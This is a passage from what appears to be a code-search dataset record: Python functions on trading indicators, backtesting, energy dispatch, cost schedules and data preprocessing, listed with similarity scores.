ohlcv[\"MACD (Signal)\"] = (pd.Series(rsi12[:min_length])).values, (pd.Series(macd[:min_length])).values, (pd.Series(macd_signal[:min_length])).values\n\tohlcv[\"MACD (Historical)\"], ohlcv[\"EMA (6)\"], ohlcv[\"EMA (12)\"] = (pd.Series(macd_hist[:min_length])).values, (pd.Series(ema6[:min_length])).values, (pd.Series(ema12[:min_length])).values\n\tohlcv[\"ROCR (3)\"], ohlcv[\"ROCR (6)\"], ohlcv[\"ATR (14)\"] = (pd.Series(rocr3[:min_length])).values, (pd.Series(rocr6[:min_length])).values, (pd.Series(atr[:min_length])).values\n\tohlcv[\"OBV\"], ohlcv[\"TRIX (20)\"] = (pd.Series(obv[:min_length])).values, (pd.Series(trix[:min_length])).values\n\n\treturn ohlcv", "def dollar_sampling(df, dollars_per_bar = 2e6):\n \n # add cumulative dollar column\n data_cm_dollar = df.assign(cmDollar=df['foreignNotional'].cumsum())\n \n # compute total_dollars\n total_dollars = data_cm_dollar.cmDollar.values[-1]\n \n # group trade by cmDollar//dollars_per_bar as groupId\n data_dollar_grp = data_cm_dollar.assign(grpId=lambda row: row.cmDollar // dollars_per_bar)\n \n # for each groupId, compute vwap, OHLC, volume, and number of trades\n data_dollar_ohlc = data_dollar_grp.groupby('grpId').apply(lambda x: _ohlc(_compute_vwap(x)))\n \n # drop index level\n data_dollar_ohlc.index = data_dollar_ohlc.index.droplevel()\n \n # drop rows with duplicated index but keep the first occurence\n data_dollar_ohlc = data_dollar_ohlc[~data_dollar_ohlc.index.duplicated(keep='first')]\n \n # keep columns\n mask = ['vwap', 'open', 'high', 'low', 'close', 'volume', 'trades']\n data_dollar_ohlc = data_dollar_ohlc[mask]\n \n return data_dollar_ohlc", "def hypoTest3(df):\n gs = df\n\n # Calculate Theatre size\n # account for cases with 0s\n\n gs['num_of_seats'] = 0\n gs.loc[(gs.seats_sold > 0) & (gs.perfs > 0) & (gs.percent_of_cap > 0), 'num_of_seats'] = (gs.seats_sold/gs.percent_of_cap/gs.perfs)\n\n testData = gs[(gs['num_of_seats'] > 0) & (gs['avg_ticket_price'] > 0)]\n testData = testData[['show','avg_ticket_price', 'num_of_seats', 'month', 'year']]\n\n # delete duplicates\n testData = testData.sort_values('num_of_seats').drop_duplicates('show')\n testData.hist()\n\n # normalize testData\n testData['log_num_seats'] = np.log(testData[['num_of_seats']])\n testData['log_price'] = np.log(testData[['avg_ticket_price']])\n\n lm_results = smf.ols('log_price ~ log_num_seats + month + year', data = testData).fit()\n\n print(lm_results.summary())", "def my_rebalance(context,data):\n log.info(\"rebalancing...\")\n context.output = pipeline_output('my_pipeline')\n log.info(\"retrieved pipeline output...\")\n \n # These are the securities that we are interested in trading each day.\n context.security_list = context.output.index\n \n if context.prime == False:\n order_target_percent(symbol('SPY'),1) #hold SPY as a default \n context.prime = True\n \n weight= 1.0/len(context.security_list)\n \n for stock in context.security_list:\n log.info(\"Buying %s\" % (stock.symbol))\n order_target_percent(stock, weight)\n \n #: Exit any positions we might have\n for stock in context.portfolio.positions:\n if data.can_trade(stock) and stock not in context.security_list:\n log.info(\"Exiting our positions on %s\" % (stock.symbol))\n order_target_percent(stock, 0)", "def update_price_signals(self, monthly_data, time_series_data):\n if self.combined_market:\n try:\n fr_price = time_series_data.loc[:, 'FR Price ($/kW)']\n except KeyError:\n pass\n else:\n self.p_regu = np.divide(fr_price, 2)\n self.p_regd = np.divide(fr_price, 2)\n\n try:\n self.price = 
time_series_data.loc[:, 'DA Price ($/kWh)']\n except KeyError:\n pass\n else:\n try:\n self.p_regu = time_series_data.loc[:, 'Reg Up Price ($/kW)']\n except KeyError:\n pass\n\n try:\n self.p_regd = time_series_data.loc[:, 'Reg Down Price ($/kW)']\n except KeyError:\n pass\n\n try:\n self.price = time_series_data.loc[:, 'DA Price ($/kWh)']\n except KeyError:\n pass", "def featurize_kof(*args):\n\n df = args[0]\n\n # initial cleaning & changes to df\n df = df.drop(columns='Unnamed: 0')\n df = df.rename(columns = {'Code_Style':'code_style', 'Name':'name', 'Brand':'brand', 'Date':'date',\n 'Retail_Price': 'retail_price', 'Colorway':'colorway', 'Story':'story',\n 'KOF_Wants':'kof_wants', 'Avg_Resale':'avg_resale_stockx'})\n df['retail_price'] = df['retail_price'].astype(int)\n df['avg_resale_stockx'] = df['avg_resale_stockx'].str.replace('[^\\w\\s]','')\n df['avg_resale_stockx'] = df['avg_resale_stockx'].astype(int)\n\n # feature 1: merge silhouettes\n all_silhouettes = eval(args[1])\n # strip out brand name from silhouette name\n temp = []\n for i in range(len(all_silhouettes)):\n silhouette = all_silhouettes[i]\n silhouette = silhouette.replace(\"Nike \", \"\")\n silhouette = silhouette.replace(\"Adidas \", \"\")\n silhouette = silhouette.replace(\"adidas \", \"\")\n temp.append(silhouette)\n all_silhouettes = temp\n all_silhouettes.append('Air Jordan 1')\n all_silhouettes = list(set(all_silhouettes))\n df['silhouette'] = df['name'].apply(lambda x: silhouette_generator(x, all_silhouettes))\n\n #feature 2: profitable\n #create columns to calculate net profit\n df['price_diff'] = df['avg_resale_stockx'] - df['retail_price']\n df['commission_fee'] = abs((df['avg_resale_stockx']) * (9.5/100))\n df['seller_fee'] = 5\n df['total_credit'] = df['price_diff'] - df['commission_fee'] - df['seller_fee']\n df['cashout_fee'] = abs((df['total_credit']) * (2.9/100))\n df['net_profit'] = df['total_credit'] - df['cashout_fee']\n #create purchase feature if the net profit is greater than 0\n df['profitable'] = np.where(df['net_profit'] > 0, 1, 0)\n #drop columns used to calculate net profit\n df.drop(['commission_fee', 'seller_fee', 'total_credit', 'cashout_fee'], axis=1, inplace=True)\n\n #feature 3: brand code\n brand_code = df.groupby('brand').ngroup()\n df = pd.concat([df, brand_code], axis=1).rename(columns={0:'brand_code'})\n\n #feature 4: word2vec colors\n nlp = spacy.load('en_vectors_web_lg')\n df['black'] = df['colorway'].apply(lambda x: color_word2vec(x, \"black\", nlp))\n df['white'] = df['colorway'].apply(lambda x: color_word2vec(x, \"white\", nlp))\n df['brown'] = df['colorway'].apply(lambda x: color_word2vec(x, \"brown\", nlp))\n df['red'] = df['colorway'].apply(lambda x: color_word2vec(x, \"red\", nlp))\n df['blue'] = df['colorway'].apply(lambda x: color_word2vec(x, \"blue\", nlp))\n df['yellow'] = df['colorway'].apply(lambda x: color_word2vec(x, \"yellow\", nlp))\n df['orange'] = df['colorway'].apply(lambda x: color_word2vec(x, \"orange\", nlp))\n df['green'] = df['colorway'].apply(lambda x: color_word2vec(x, \"green\", nlp))\n df['purple'] = df['colorway'].apply(lambda x: color_word2vec(x, \"purple\", nlp))\n df['multi_color'] = df['colorway'].apply(lambda x: color_word2vec(x, \"multi color\", nlp))\n df['main_color'] = df[['black', 'white', 'brown', 'red', 'blue', 'yellow',\n 'orange', 'green', 'purple', 'multi_color']].idxmax(axis=1)\n df['main_color_id'] = df.groupby('main_color').ngroup()\n\n #boolean features\n df['womens'] = df['name'].apply(lambda x: label_womens(x))\n\n df['bcollab'] = 
df['name'].apply(lambda x: label_bcollab(x))\n\n df['og'] = df['name'].apply(lambda x: label_og(x))\n\n df['sp'] = df['name'].apply(lambda x: label_sp(x))\n\n df['qs'] = df['name'].apply(lambda x: label_qs(x))\n\n df['sb'] = df['name'].apply(lambda x: label_sb(x))\n\n df['ls'] = df['name'].apply(lambda x: label_ls(x))\n\n df['nrg'] = df['name'].apply(lambda x: label_nrg(x))\n\n df['prm'] = df['name'].apply(lambda x: label_prm(x))\n\n df['nsw'] = df['name'].apply(lambda x: label_nsw(x))\n\n df['retro'] = df['name'].apply(lambda x: label_retro(x))\n\n df['se'] = df['name'].apply(lambda x: label_se(x))\n\n df['pe'] = df['name'].apply(lambda x: label_pe(x))\n\n df['gs'] = df['name'].apply(lambda x: label_gs(x))\n\n df['hs'] = df['name'].apply(lambda x: label_hs(x))\n\n return df", "def __init__(\n self,\n portfolio,\n market=None,\n commission_min=5.00,\n commission_pct=0.0,\n buy_percent=1.0,\n sell_percent=1.0,\n pm_threshold=0.0,\n pm_order=1.0,\n risk_free_return=1.0,\n name=None\n ):\n\n # Assumptions\n self.name = name if name else portfolio.name\n self.commission_min = commission_min\n self.commission_pct = commission_pct\n self.buy_percent = buy_percent\n self.sell_percent = sell_percent\n self.pm_threshold = pm_threshold\n self.pm_order = pm_order\n self.risk_free_return = risk_free_return\n self.performance = {}\n\n # Inputs\n self.portfolio = portfolio\n self.market = copy.deepcopy(market) if market else Asset(np.ones(len(self.portfolio.dates)))\n\n # Trading states\n self.long_open = {symbol:False for symbol in portfolio.assets.keys()}\n self.short_open = {symbol:False for symbol in portfolio.assets.keys()}\n\n # Keep track of intermidiate results for performance\n self.trade_data = []\n recordings = [\n 'buy price', 'buy shares', 'buy fees', 'buy date',\n 'sell price', 'sell shares', 'sell fees', 'sell date',\n 'gain', 'profit', 'loss', 'return', 'win/loose',\n 'min balance', 'min date', 'max balance', 'max date',\n 'drawdown', 'drawdown days',\n 'volatility', 'expected_return', 'beta', 'lpm', 'hpm',\n 'max', 'mean', 'min'\n ]\n self.record = {symbol:pd.DataFrame(columns=recordings) for symbol in portfolio.assets.keys()}\n self.max = {symbol:[portfolio.assets[symbol].c.iloc[0], None] for symbol in portfolio.assets.keys()}\n self.min = {symbol:[999999999999999, None] for symbol in portfolio.assets.keys()}\n self.drawdown = {symbol:[999999999999999, None] for symbol in portfolio.assets.keys()}", "def testAggregateCorrectly(self):\n\n\tscaler = pf.LinearScaler()\n\tQBp = pf.ProductQuoteBasis(base_price = 1.53, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(1, '1/gal'))\n\tesc = pf.NoEscalationEscalator()\n\tpr1 = pf.Product(name = 'gasoline', description = 'People', quote_basis = QBp, escalator = esc)\n\n\tpro1 = pf.Production(name = 'stream1', product = pr1, rate = uv.UnitVal(15000, 'gal/hr'), startup_discounter = None, init_date = dt.datetime(2012,01,01))\n\n\tQB = pf.VariableExpenseQuoteBasis(base_price = 0.062, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(1, '1/(kW*hr)'))\n\tvex1 = pf.VariableExpense(name = 'Electricity', description = 'Power consumption by plant', quote_basis = QB, production = pro1, rate = uv.UnitVal(1, 'kW*hr/gal'), escalator = esc)\n\n\tQB2 = pf.VariableExpenseQuoteBasis(base_price = 75, date = dt.datetime(2012,01,01), source= 'Tom Miles', scaler = scaler, size_basis = uv.UnitVal(1, '1/ton'))\n\tvex2 = pf.VariableExpense(name = 'Biomass', description = 'Biomass used by 
plant', quote_basis = QB2, production = pro1, rate = uv.UnitVal(1.0/150.0, 'ton/gal'), escalator = esc)\n\n\tdates = [dt.datetime(2012,01,31), dt.datetime(2013,01,31), dt.datetime(2020, 03, 31), dt.datetime(2021, 12,31)]\n vals = [202320,202320,202320,202320]\n\tend_date = dt.datetime(2034,12,31)\n\tcosts = pf.VariableCosts()\n costs.add_variable_expense(vex1)\n costs.add_variable_expense(vex2)\n costs.build_vex_schedule(end_date)\n\t\n for d, v in zip(dates, vals):\n self.assertAlmostEqual(v, costs.schedule.loc[d, 'variable_costs'],4)", "def dispatch_max_sc_bhv(pv, demand, bhv,prices_binned,inv_size,param , return_series=False, bins_soc=[0,33,66,100],bins_price=[0.04,0.12,0.20,0.28],kW_dis=4):\n \n bat_size_e_adj = param['BatteryCapacity']\n bat_size_p_adj = param['MaxPower']\n n_bat = param['BatteryEfficiency']\n n_inv = param['InverterEfficiency']\n timestep = param['timestep']\n # We work with np.ndarrays as they are much faster than pd.Series\n Nsteps = len(pv)\n LevelOfCharge = np.zeros(Nsteps)\n inv2grid = np.zeros(Nsteps)\n inv_array=np.tile(inv_size/n_inv,len(pv))\n pv2store = np.zeros(Nsteps)\n store2inv = np.zeros(Nsteps)\n inv2curt = np.zeros(Nsteps)\n \n flagsell = np.zeros(Nsteps)\n store2load = np.zeros(Nsteps)\n store2grid = np.zeros(Nsteps)\n flag_12h=np.full((Nsteps), False)\n #grid2store = np.zeros(Nsteps) # TODO Always zero for now.\n \n #Load served by PV\n pv2load_dc = np.array([pv, demand / n_inv,inv_array]).min(axis=0) # DC direct self-consumption, with inverter limitation\n\n #Residual load\n res_load = demand - (pv2load_dc * n_inv) # AC\n inv2load = pv2load_dc * n_inv # AC\n\n #Excess PV\n res_pv = pv-pv2load_dc # DC\n\n #PV to storage after eff losses\n pv2inv = pv2load_dc*n_inv # AC\n\n #first timestep = 0\n LevelOfCharge[0] = 0 # bat_size_e_adj / 2 # DC\n\n #get the sp hours\n delta=dt.timedelta(hours=12)\n sp_hour=res_pv.ne(0).groupby([res_pv.index.month,res_pv.index.day]).idxmax().droplevel(1).reset_index(drop=True)\n twelve_bf=sp_hour-delta\n\n for i in range(1,Nsteps): \n #PV to storage\n if LevelOfCharge[i-1] >= bat_size_e_adj: # if battery is full\n pv2store[i] = 0\n else: #if battery is not full\n if LevelOfCharge[i-1] + res_pv[i] * n_bat * timestep > bat_size_e_adj: # if battery will be full after putting excess\n pv2store[i] = min((bat_size_e_adj - LevelOfCharge[i-1]) / timestep, bat_size_p_adj)\n else:\n# pv2store[i] = min(res_pv[i], bat_size_p_adj)\n pv2store[i] = min(res_pv[i] * n_bat, bat_size_p_adj)\n #Storage to load\n if (pv2store[i]==0)&(res_pv[i]==0): \n #According to prosumer behaviour the battery will inject into the community or not only if there is not PV suplus\n store2load[i] = min(bat_size_p_adj,(inv_size/n_inv-pv2load_dc[i]), #Power\n res_load[i] / n_inv, #Power\n LevelOfCharge[i-1] / timestep) # Power; all in DC\n if (pv.index[i]<=sp_hour[int(np.floor((i)/96))]) & (pv.index[i]>twelve_bf[int(np.floor((i)/96))]):\n #if timestep is between twelve hours before and the surplus hour\n try:\n flag_12h[i]=True\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==np.digitize(LevelOfCharge[i-1],bins=bins_soc))&\n (bhv.surplus_time=='12h'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = 
(store2load[i]+store2grid[i]) # DC\n\n # here should take into account whether the prosumer desires to sell or not according to his preferences (SOC,price)\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n except Exception as e:\n # Ugly but provisional SOC bin from 0 to 1\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==1)&\n (bhv.surplus_time=='12h'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n \n else: \n try:\n \n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==np.digitize(LevelOfCharge[i-1],bins=bins_soc))&\n (bhv.surplus_time=='12h+'),'sell'].values):#if sell\n #surplus_time==12h+\n # sell 1 kWh of energy to the community and cover residual load if excess \n flagsell[i]=2\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n\n # here should take into account whether the prosumer desires to sell or not according to his preferences (SOC,price)\n else: # no sell then cover only res_load\n #print('out12h+')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n except Exception as e:\n # Ugly but provisional SOC bin from 0 to 1\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==1)&\n (bhv.surplus_time=='12h+'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n #SOC\n LevelOfCharge[i] = min(LevelOfCharge[i-1] - (store2inv[i] - pv2store[i]*n_bat ) * timestep, # DC\n bat_size_e_adj)#modif to original, store2inv=pv2store*n_bat\n\n pv2grid_dc=np.array([pv-pv2store,inv_array]).min(axis=0)-pv2load_dc # DC\n pv2inv= (pv2grid_dc+pv2load_dc)*n_inv # AC\n inv2curt=pv-pv2grid_dc-pv2load_dc-pv2store # DC\n\n inv2load = (pv2load_dc + store2load) * n_inv # AC\n inv2grid = (pv2grid_dc+store2grid) * n_inv # AC\n grid2load = demand - inv2load # AC\n #MaxDischarge = np.minimum(LevelOfCharge[i-1]*BatteryEfficiency/timestep,MaxPower)\n batt_losses=pv2store*(1-n_bat)\n inv_losses=(pv2grid_dc+pv2load_dc+store2inv)*(1-n_inv)\n \n out = {'pv2inv': pv2inv, # AC\n 'res_pv':res_pv, # DC\n 'pv2store': pv2store, # DC\n 'inv2load': inv2load, # AC\n 'grid2load': grid2load, # AC\n 'store2inv': store2inv, # DC\n 'inv2curt':inv2curt, # DC\n 'LevelOfCharge': LevelOfCharge, # kWh\n 'inv2grid': inv2grid, # AC\n 'inv_losses':inv_losses,\n 'batt_losses':batt_losses,\n 'flag_sell':flagsell,\n 'flag_12h':flag_12h, \n 'store2grid':store2grid*n_inv, # AC\n 
'store2load':store2load*n_inv # AC\n \n }\n if not return_series:\n out_pd = {}\n for k, v in out.items(): # Create dictionary of pandas series with same index as the input pv\n out_pd[k] = pd.Series(v, index=pv.index)\n out = out_pd\n \n return out", "def implied_discount_factor(p1: Instrument, c1: Instrument, p2: Instrument, c2: Instrument) -> float:\n return (c1.price - p1.price - c2.price + p2.price)/ (c2.strike - c1.strike)", "def update_profit(self):\n # Acessing Redis can cause greenlet switches because new jobs. We don't\n # want to potentially switch jobs multiple times quickly, so we update\n # the profitability information all at once after the loop to avoid\n # multiple network switches\n new_price_data = {}\n for manager in self.jobmanagers.itervalues():\n currency = manager.config['currency']\n pscore = self.redis.get(\"{}_profit\".format(currency))\n\n # Deserialize\n if pscore:\n try:\n pscore = simplejson.loads(pscore, use_decimal=True)\n except Exception:\n self.logger.warn(\n \"Error parsing profit score for {}! Setting it to 0..\"\n .format(currency))\n pscore = 0\n pass\n # If no score was grabbed, pass a 0 value score\n else:\n self.logger.warn(\"Unable to grab profit info for {}!\"\n .format(currency))\n pscore = 0\n\n ratio = self.redis.get(\"{}_ratio\".format(currency)) or 1.0\n ratio = float(ratio)\n\n # Only set updated if it actually changed\n if self.price_data[currency][0] != pscore or self.price_data[currency][1] != ratio:\n new_price_data[currency] = (pscore, ratio, time.time())\n\n # If we have some new information, adjust accordingly\n if new_price_data:\n self.logger.info(\"Updated price information for {}\"\n .format(new_price_data.keys()))\n # Atomic update in gevent\n self.price_data.update(new_price_data)\n\n # Update all the profit info. 
No preemption, just maths\n for currency in self.jobmanagers.iterkeys():\n self.update_profitability(currency)\n\n self.logger.debug(\n \"Re-checking best network after new price data for {}\"\n .format(new_price_data.keys()))\n self.check_best()", "def preprocessing(df, product_number):\n useless_columns = ['Customers', 'Category', 'Segment', 'Regione', 'Provincia', 'Channel']\n df = df.drop(df[df.Provincia == '**'].index) # Removing 'Estero'\n for column in useless_columns:\n df = df.drop(column, axis=1)\n df = df_filtered_product(df, product_number) # Choose the number of the product\n df = df.groupby(['Data Rif']).sum().reset_index()\n date_range = pd.date_range('2017-01-02', '2019-03-31', freq='D').to_series()\n week_num = len(date_range) // 7\n index = 0\n\n sales = []\n for week in range(0, week_num):\n STU = 0\n for day in range(0, 7):\n if index == len(df):\n break\n elif date_range[week*7 + day] == df['Data Rif'][index]:\n STU += df['Standard Units'][index]\n index += 1\n sales.append([date_range[week*7], STU])\n df_fin = pd.DataFrame(sales, columns=['Week', 'STU'])\n df_fin.Week = pd.to_datetime(df_fin.Week)\n df_fin.set_index('Week', inplace=True)\n return df_fin", "def classify():\n yes_dataset = df[df[\"_class\"] == 1] # 470588\n no_dataset = df[df[\"_class\"] == 0] # 1971\n\n parameter_analysis = list()\n for criterion in np.arange(0.05, 0.91, 0.05):\n print(\"doing experiment at criterion = %s ...\" % criterion)\n rate_list = list()\n for i in range(10):\n # shuffle yes_dataset and no_dataset, so we can randomly choose 90% yes_dataset\n # + 90% no_dataset as train dataset, 10% yes_dataset + 10% no_dataset as test dataset\n yes_index = yes_dataset.index.tolist()\n random.shuffle(yes_index)\n no_index = no_dataset.index.tolist()\n random.shuffle(no_index)\n \n # concatenate 90%yes + 90%no, 10%yes + 10%no\n train = pd.concat([\n yes_dataset.loc[yes_index[:1774], :],\n no_dataset.loc[no_index[:423530], :]\n ])\n test = pd.concat([\n yes_dataset.loc[yes_index[1774:], :],\n no_dataset.loc[no_index[423530:], :]\n ]) \n \n # split data and label\n train_data, train_label = (train[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n train[\"_class\"])\n test_data, test_label = (test[[\"Revenue.Code\", \n \"Service.Code\", \n \"Procedure.Code\", \n \"Diagnosis.Code\", \n \"Subscriber.Index\"]], \n test[\"_class\"])\n \n # apply classifier\n clf = GaussianNB()\n clf.fit(train_data, train_label)\n probability = clf.predict_proba(test_data).T[1]\n \n result = pd.DataFrame()\n result[\"_class\"] = test_label\n result[\"_predict\"] = probability >= criterion\n \n result_yes = result[result[\"_class\"] == 1]\n yes_yes_rate = sum(result_yes[\"_class\"] == result_yes[\"_predict\"])/len(result_yes[\"_predict\"])\n \n result_no = result[result[\"_class\"] == 0]\n no_no_rate = sum(result_no[\"_class\"] == result_no[\"_predict\"])/len(result_no[\"_predict\"])\n \n rate_list.append((yes_yes_rate, no_no_rate))\n\n rate_list = pd.DataFrame(rate_list)\n yes_yes_rate, no_no_rate = rate_list.mean()[0], rate_list.mean()[1]\n parameter_analysis.append((criterion, yes_yes_rate, no_no_rate))\n \n # save data to excel spreadsheet\n parameter_analysis = pd.DataFrame(parameter_analysis, columns=[\"criterion\", \"yes_yes_rate\", \"no_no_rate\"])\n writer = pd.ExcelWriter(\"parameter_analysis.xlsx\")\n parameter_analysis.to_excel(writer, \"parameter_analysis\", index=False)\n writer.save()", "def testAggregateDetailedCorrectly(self):\n\tscaler = 
pf.LinearScaler()\n\tQBp = pf.ProductQuoteBasis(base_price = 1.53, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(100, '1/gal'))\n\tesc = pf.NoEscalationEscalator()\n\tpr1 = pf.Product(name = 'gasoline', description = 'People', quote_basis = QBp, escalator = esc)\n\tpro1 = pf.Production(name = 'stream1', product = pr1, rate = uv.UnitVal(15000, 'gal/hr'), startup_discounter = None, init_date = dt.datetime(2015,01,01))\n\n\tQB = pf.VariableExpenseQuoteBasis(base_price = 0.062, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(100, '1/(kW*hr)'))\n\tvex1 = pf.VariableExpense(name = 'Electricity', description = 'Power consumption by plant', quote_basis = QB, production = pro1, rate = uv.UnitVal(1, 'kW*hr/gal'), escalator = esc)\n\n\tQB2 = pf.VariableExpenseQuoteBasis(base_price = 75, date = dt.datetime(2012,01,01), source= 'Tom Miles', scaler = scaler, size_basis = uv.UnitVal(1, '1/ton'))\n\tvex2 = pf.VariableExpense(name = 'Biomass', description = 'Biomass used by plant', quote_basis = QB2, production = pro1, rate = uv.UnitVal(1.0/150.0, 'ton/gal'), escalator = esc)\n\n\n\tdates = [dt.datetime(2012,01,31), dt.datetime(2013,01,31), dt.datetime(2020, 03, 31), dt.datetime(2021, 12,31)]\n \n\tcosts = pf.VariableCosts()\n costs.add_variable_expense(vex1)\n costs.add_variable_expense(vex2)\n\tcosts.detailed = True\n\tend_date = dt.datetime(2034,12,31)\n costs.build_vex_schedule(end_date)\n\t\n for d in dates:\n self.assertTrue((vex1.schedule['variable_consumption'] == costs.schedule['Electricity_variable_consumption']).all())\n\t self.assertTrue((vex1.schedule['variable_costs'] == costs.schedule['Electricity_variable_costs']).all())\n\t self.assertTrue((vex2.schedule['variable_consumption'] == costs.schedule['Biomass_variable_consumption']).all())\n\t self.assertTrue((vex2.schedule['variable_costs'] == costs.schedule['Biomass_variable_costs']).all())" ]
[ "0.5864486", "0.5679427", "0.55887026", "0.55827385", "0.5496743", "0.5447927", "0.5396345", "0.5391044", "0.5382922", "0.5358451", "0.53466296", "0.53371716", "0.52985895", "0.528991", "0.52696675", "0.52553165", "0.5239735", "0.5239484", "0.5230781", "0.5222127", "0.522195", "0.5221847", "0.52176726", "0.5213727", "0.52087325", "0.52003354", "0.5191661", "0.516923", "0.514408", "0.5135974", "0.51303107", "0.51288533", "0.5120938", "0.5110803", "0.5109255", "0.5107914", "0.5096873", "0.5088177", "0.5068333", "0.506565", "0.50533986", "0.5046693", "0.5029332", "0.50257355", "0.50188357", "0.5008271", "0.50055486", "0.50036544", "0.4998935", "0.49973643", "0.49966025", "0.49917346", "0.49843284", "0.49843276", "0.49790782", "0.49752232", "0.4970256", "0.49526387", "0.4940358", "0.49402878", "0.4938559", "0.49304911", "0.4892052", "0.48848832", "0.48821113", "0.48817983", "0.48806047", "0.48804542", "0.4873827", "0.48735732", "0.4871221", "0.48647738", "0.486116", "0.48590666", "0.48550096", "0.4854773", "0.48506847", "0.4849877", "0.48485437", "0.48446375", "0.48396295", "0.4839204", "0.48328927", "0.48304427", "0.4825914", "0.48216772", "0.48151577", "0.48110935", "0.48047957", "0.48046988", "0.4802432", "0.4801989", "0.48018727", "0.47968838", "0.47958788", "0.47912318", "0.47901857", "0.47897637", "0.47851998", "0.47832692" ]
0.5120163
33
Returns an instance of fetcher
def initialize() -> fetcher.Fetcher:
    options = fetcher.Input(
        command="some_cmd",
        config_file="looker.ini",
        section="Looker"
    )
    return fetcher.Fetcher(options)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_fetcher(self):\n return self.__fetcher", "def fetch(self) -> Fetch:\n return self._fetch", "def get_fetcher(\n launcher_url: str, output_dir: str, spec: Optional[str] = None\n) -> WorkflowFetcherBase:\n parsed_url = ParsedUrl(launcher_url)\n\n if parsed_url.scheme not in FETCHER_ALLOWED_SCHEMES:\n raise ValueError(\"URL scheme not allowed\")\n\n if spec:\n _, spec_ext = os.path.splitext(spec)\n if spec_ext not in WORKFLOW_SPEC_EXTENSIONS:\n raise ValueError(\n \"The provided specification doesn't have a valid file extension\"\n )\n\n if parsed_url.netloc == \"github.com\":\n return _get_github_fetcher(parsed_url, output_dir, spec)\n elif parsed_url.netloc in FETCHER_ALLOWED_GITLAB_HOSTNAMES:\n return _get_gitlab_fetcher(parsed_url, output_dir, spec)\n elif parsed_url.extension == \".git\":\n return WorkflowFetcherGit(parsed_url, output_dir, spec=spec)\n elif parsed_url.extension == \".zip\":\n return WorkflowFetcherZip(parsed_url, output_dir, spec)\n elif parsed_url.extension in WORKFLOW_SPEC_EXTENSIONS:\n if spec:\n raise ValueError(\n \"Cannot use the 'specification' argument when the URL points directly \"\n \"to a specification file\"\n )\n return WorkflowFetcherYaml(parsed_url, output_dir)\n else:\n raise ValueError(\"Cannot handle given URL\")", "def get_fetcher(tag):\n global FETCHERS\n if not tag in FETCHERS:\n valid_sources = (\", \").join(FETCHERS.keys())\n raise ValueError(\"invalid source name \"\n + \"(current source: {})\".format(valid_sources))\n\n return FETCHERS[tag]", "def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.slug)\n self.__init__(**data)", "async def fetch_async(self) -> FleetInstance:\n\n payload = await self._version.fetch_async(\n method=\"GET\",\n uri=self._uri,\n )\n\n return FleetInstance(\n self._version,\n payload,\n sid=self._solution[\"sid\"],\n )", "def fromurl(cls, url: str):\n return cls.parse_obj(requests.get(url).json())", "def get(cls, fetcher_name_request: str):\n\n\t\tfor i in cls:\n\t\t\tif i.name == fetcher_name_request.upper():\n\t\t\t\treturn i.value\n\t\traise FetcherNotFound(fetcher_name_request)", "def pull(self):\n data = api.get(endpoint=self.endpoint, resource_id=self.id)\n self.__init__(**data)", "async def from_url(cls) -> \"AocPrivateLeaderboard\":\n api_json = await cls.json_from_url()\n return cls.from_json(api_json)", "def get(self):\n # If we have a cache_key, see if there is data under that key\n # in our url cache and use that if there is.\n #\n if self.cache_key and self.cache_key in self.cache:\n return self.cache[self.cache_key]\n\n # If the actual URL is the empty string, and we did not have a cached\n # result for it, then we can not retrieve anything. Return None.\n #\n if self.url is None or len(self.url) == 0:\n return None\n\n if not self.use_post:\n # If we are NOT using 'POST' to query the URL we can create a\n # simple urllib2.Request object.\n #\n req = urllib2.Request(self.url)\n else:\n # If we ARE using 'POST' then we need to interpret the\n # parameters out of the URL and pass them as the 'data'\n # parameter to the request object we are creating. 
